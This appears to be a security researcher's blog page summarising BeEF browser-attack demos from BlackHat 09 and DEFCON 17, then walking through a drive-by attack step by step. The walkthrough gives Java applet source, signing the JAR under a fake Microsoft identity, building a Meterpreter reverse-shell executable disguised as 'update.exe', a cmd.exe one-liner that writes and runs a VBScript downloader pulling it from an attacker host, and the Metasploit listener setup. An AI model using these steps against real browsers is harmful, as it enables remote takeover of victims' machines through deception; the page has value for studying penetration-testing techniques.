Detecting Browser Plugins

This is a module from the Browser Exploitation Framework (BeEF) to detect all of the plugins available within the browser. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Advertisement

Disabling Safebrowsing

These are the steps used to disable SafeBrowsing within the Firefox Browser. This can also be done using Edit->Preferences and selecting security, then unchecking “Block reported attack sites” and “Block reported web forgeries”. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Virtualization Detection

This is a module from the Browser Exploitation Framework (BeEF) to detect the virtualization technology being used on by the client. This technique uses the MAC address with a regular expression to identify if the client is running on VMware, QEMU, VirtualBox or Amazon EC2. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

SMBenum (Software Detection)

This is a module from the Browser Exploitation Framework (BeEF) to detect software on the clients machine. This technique uses local rendering of GIF images with SMB within the browser. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Visited URLs (Alexa Top 500)

This is a module from the Browser Exploitation Framework (BeEF) to identity all of the URL that the client has visited. This technique uses the CSS history to identify valid results. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Malicious Metasploit Applet (via BeEF)

This is a module from the Browser Exploitation Framework (BeEF) to load a malicious Java Applet on the client. If the client runs the applet a connection from the client’s system to the attacker’s system is made using the Metasploit Exploitation Framework. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Metasploit Autopwn (via BeEF)

This is a module from the Browser Exploitation Framework (BeEF) to perform an iframe redirection to Metasploit Browser Autopwn or a Browser Exploit. However, in this video, we used netcat (nc) instead of Metasploit. We configured netcat to listen and verify that the request was made to netcat. In exploitation, Metasploit would launch the exploit(s) against the client once the first request is made. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.

Building a Java Applet with Meterpreter Payload

At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.

In this post, we will build an Applet that executes cmd.exe. Here is the source code of the Applet:

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String cmd = "cmd.exe";
try {
f = Runtime.getRuntime().exec(cmd);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}
Next, we need to self-sign the applet so that it can be run with access within the browser.

Compile the Applet source code to an executable class.
javac MSFcmd.java
Package the compiled class into a JAR file.
jar cvf MSFcmd.jar MSFcmd.class
Generate key pairs.
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file.
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate.
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use,I built a simple bash script called makeapplet.sh.

Example of running makeapplet.sh:
./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
[Unknown]:
What is the name of your organizational unit?
[Unknown]: Microsoft
What is the name of your organization?
[Unknown]: Microsoft Organization
What is the name of your City or Locality?
[Unknown]: Redmond
What is the name of your State or Province?
[Unknown]: Seatle
What is the two-letter country code for this unit?
[Unknown]: US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
[no]: yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo “<applet code=”MSFcmd.class” archive=”SignedMSFcmd.jar”
height=”1″ width=”1″></applet>” > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the webserver from a windows system, which will execute cmd.exe

To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit:

The executable can be constructed by:
(replace x.x.x.x with the ip of your server)

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R
| ./msfencode -t exe -o update.exe;
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now, we need to add a command into the Java Applet to download and execute the executable:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe
(replace x.x.x.x with the ip of your server)

Reference: http://www.milw0rm.com/papers/262

Setup Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j

…
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!

Regards,
Jabra

MS09-002 Exploit via BeEF

Metasploit Adobe UtilPrintf Exploit